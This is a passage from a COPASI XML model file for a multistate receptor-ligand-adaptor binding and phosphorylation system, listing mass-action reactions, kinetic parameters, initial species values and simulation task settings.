<SourceParameter reference="Metabolite_398"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_477" name="R6" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_477"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_397" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_1577" stoichiometry="1"/> <Product metabolite="Metabolite_1586" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_10128" name="k1" value="0.1"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_9"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_397"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_478" name="R7" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_478"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_396" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_1578" stoichiometry="1"/> <Product metabolite="Metabolite_397" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7271" name="k1" value="0.1"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_0"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_396"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_479" name="R8" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_479"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_396" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_1586" stoichiometry="1"/> <Product metabolite="Metabolite_398" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7278" name="k1" value="0.1"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_9"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_396"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_480" name="R9" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_480"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_396" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_395" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7277" name="k1" value="0.01"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_10"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_396"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_481" name="R10" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_481"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_395" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_1578" stoichiometry="1"/> <Product metabolite="Metabolite_394" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7281" name="k1" value="0.1"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_0"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_395"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_482" name="R11" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_482"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_395" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_398" stoichiometry="1"/> <Product metabolite="Metabolite_393" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7272" name="k1" value="0.1"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_9"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_395"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_483" name="R12" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_483"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_395" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_396" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7273" name="k1" value="0.1"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_11"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_395"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_484" name="R13" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_484"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_1578" stoichiometry="1"/> <Substrate metabolite="Metabolite_394" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_395" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7269" name="k1" value="0.01"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_1"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_1578"/> <SourceParameter reference="Metabolite_394"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_485" name="R14" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_485"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_1577" stoichiometry="1"/> <Substrate metabolite="Metabolite_393" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_394" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7274" name="k1" value="0.01"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_8"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_1577"/> <SourceParameter reference="Metabolite_393"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_486" name="R15" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_486"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_398" stoichiometry="1"/> <Substrate metabolite="Metabolite_393" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_395" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7267" name="k1" value="0.01"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_8"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_398"/> <SourceParameter reference="Metabolite_393"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_487" name="R16" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_487"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_394" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_1577" stoichiometry="1"/> <Product metabolite="Metabolite_393" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7268" name="k1" value="0.1"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_9"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_394"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_488" name="R17" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_488"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_394" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_397" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7270" name="k1" value="0.1"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_11"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_394"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_489" name="R18" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_489"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_393" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_1586" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7263" name="k1" value="0.1"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_11"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_393"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> </ListOfReactions> <ListOfModelParameterSets activeSet="ModelParameterSet_1"> <ModelParameterSet key="ModelParameterSet_1" name="Initial State"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelParameterSet_1"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T19:11:07Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ModelParameterGroup cn="String=Initial Time" type="Group"> <ModelParameter cn="CN=Root,Model=multistate" value="0" type="Model" simulationType="time"/> </ModelParameterGroup> <ModelParameterGroup cn="String=Initial Compartment Sizes" type="Group"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Compartments[cell]" value="1" type="Compartment" simulationType="fixed"/> </ModelParameterGroup> <ModelParameterGroup cn="String=Initial Species Values" type="Group"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[R(a\,l)]" value="393939" type="Species" simulationType="reactions"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[L(r)]" value="424242" type="Species" simulationType="reactions"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~U\,r)]" value="393939" type="Species" simulationType="reactions"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[L(r!1).R(a\,l!1)]" value="0" type="Species" simulationType="reactions"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~U\,r!1).R(a!1\,l)]" value="0" type="Species" simulationType="reactions"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~U\,r!1).L(r!2).R(a!1\,l!2)]" value="0" type="Species" simulationType="reactions"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~P\,r!1).L(r!2).R(a!1\,l!2)]" value="0" type="Species" simulationType="reactions"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~P\,r!1).R(a!1\,l)]" value="0" type="Species" simulationType="reactions"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~P\,r)]" value="0" type="Species" simulationType="reactions"/> </ModelParameterGroup> <ModelParameterGroup cn="String=Initial Global Quantities" type="Group"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[R0]" value="393939" type="ModelValue" simulationType="fixed"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[L0]" value="424242" type="ModelValue" simulationType="fixed"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[A0]" value="393939" type="ModelValue" simulationType="fixed"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[kon]" value="0.01" type="ModelValue" simulationType="fixed"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[koff]" value="0.10000000000000001" type="ModelValue" simulationType="fixed"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[kAon]" value="0.01" type="ModelValue" simulationType="fixed"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[kAoff]" value="0.10000000000000001" type="ModelValue" simulationType="fixed"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[kAp]" value="0.01" type="ModelValue" simulationType="fixed"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[kAdp]" value="0.10000000000000001" type="ModelValue" simulationType="fixed"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[Group_A_P]" value="0" type="ModelValue" simulationType="assignment"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[Group_A_unbound_P]" value="0" type="ModelValue" simulationType="assignment"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[Group_A_bound_P]" value="0" type="ModelValue" simulationType="assignment"/> <ModelParameter cn="CN=Root,Model=multistate,Vector=Values[Group_RLA_P]" value="0" type="ModelValue" simulationType="assignment"/> </ModelParameterGroup> <ModelParameterGroup cn="String=Kinetic Parameters" type="Group"> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R1]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R1],ParameterGroup=Parameters,Parameter=k1" value="0.01" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kon],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R2]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R2],ParameterGroup=Parameters,Parameter=k1" value="0.01" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAon],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R3]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R3],ParameterGroup=Parameters,Parameter=k1" value="0.01" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kon],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R4]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R4],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[koff],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R5]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R5],ParameterGroup=Parameters,Parameter=k1" value="0.01" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAon],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R6]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R6],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAoff],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R7]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R7],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[koff],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R8]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R8],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAoff],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R9]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R9],ParameterGroup=Parameters,Parameter=k1" value="0.01" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAp],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R10]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R10],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[koff],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R11]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R11],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAoff],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R12]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R12],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAdp],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R13]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R13],ParameterGroup=Parameters,Parameter=k1" value="0.01" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kon],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R14]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R14],ParameterGroup=Parameters,Parameter=k1" value="0.01" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAon],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R15]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R15],ParameterGroup=Parameters,Parameter=k1" value="0.01" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAon],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R16]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R16],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAoff],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R17]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R17],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAdp],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> <ModelParameterGroup cn="CN=Root,Model=multistate,Vector=Reactions[R18]" type="Reaction"> <ModelParameter cn="CN=Root,Model=multistate,Vector=Reactions[R18],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="assignment"> <InitialExpression> &lt;CN=Root,Model=multistate,Vector=Values[kAdp],Reference=InitialValue> </InitialExpression> </ModelParameter> </ModelParameterGroup> </ModelParameterGroup> </ModelParameterSet> </ListOfModelParameterSets> <StateTemplate> <StateTemplateVariable objectReference="Model_1"/> <StateTemplateVariable objectReference="Metabolite_1577"/> <StateTemplateVariable objectReference="Metabolite_396"/> <StateTemplateVariable objectReference="Metabolite_395"/> <StateTemplateVariable objectReference="Metabolite_397"/> <StateTemplateVariable objectReference="Metabolite_393"/> <StateTemplateVariable objectReference="Metabolite_1586"/> <StateTemplateVariable objectReference="Metabolite_398"/> <StateTemplateVariable objectReference="Metabolite_394"/> <StateTemplateVariable objectReference="Metabolite_1578"/> <StateTemplateVariable objectReference="ModelValue_12"/> <StateTemplateVariable objectReference="ModelValue_13"/> <StateTemplateVariable objectReference="ModelValue_14"/> <StateTemplateVariable objectReference="ModelValue_15"/> <StateTemplateVariable objectReference="Compartment_67"/> <StateTemplateVariable objectReference="ModelValue_4"/> <StateTemplateVariable objectReference="ModelValue_3"/> <StateTemplateVariable objectReference="ModelValue_2"/> <StateTemplateVariable objectReference="ModelValue_1"/> <StateTemplateVariable objectReference="ModelValue_0"/> <StateTemplateVariable objectReference="ModelValue_8"/> <StateTemplateVariable objectReference="ModelValue_9"/> <StateTemplateVariable objectReference="ModelValue_10"/> <StateTemplateVariable objectReference="ModelValue_11"/> </StateTemplate> <InitialState type="initialState"> 0 393939 0 0 0 0 393939 0 0 424242 0 0 0 0 1 393939 424242 393939 0.01 0.10000000000000001 0.01 0.10000000000000001 0.01 0.10000000000000001 </InitialState> </Model> <ListOfTasks> <Task key="Task_28" name="Steady-State" type="steadyState" scheduled="false" updateModel="false"> <Report reference="Report_11" target="" append="1" confirmOverwrite="1"/> <Problem> <Parameter name="JacobianRequested" type="bool" value="1"/> <Parameter name="StabilityAnalysisRequested" type="bool" value="1"/> </Problem> <Method name="Enhanced Newton" type="EnhancedNewton"> <Parameter name="Resolution" type="unsignedFloat" value="1.0000000000000001e-09"/> <Parameter name="Derivation Factor" type="unsignedFloat" value="0.001"/> <Parameter name="Use Newton" type="bool" value="1"/> <Parameter name="Use Integration" type="bool" value="1"/> <Parameter name="Use Back Integration" type="bool" value="0"/> <Parameter name="Accept Negative Concentrations" type="bool" value="0"/> <Parameter name="Iteration Limit" type="unsignedInteger" value="50"/> <Parameter name="Maximum duration for forward integration" type="unsignedFloat" value="1000000000"/> <Parameter name="Maximum duration for backward integration" type="unsignedFloat" value="1000000"/> <Parameter name="Target Criterion" type="string" value="Distance and Rate"/> </Method> </Task> <Task key="Task_16" name="Time-Course" type="timeCourse" scheduled="true" updateModel="false"> <Report reference="Report_24" target="multistate_gillespie.out" append="1" confirmOverwrite="0"/> <Problem> <Parameter name="AutomaticStepSize" type="bool" 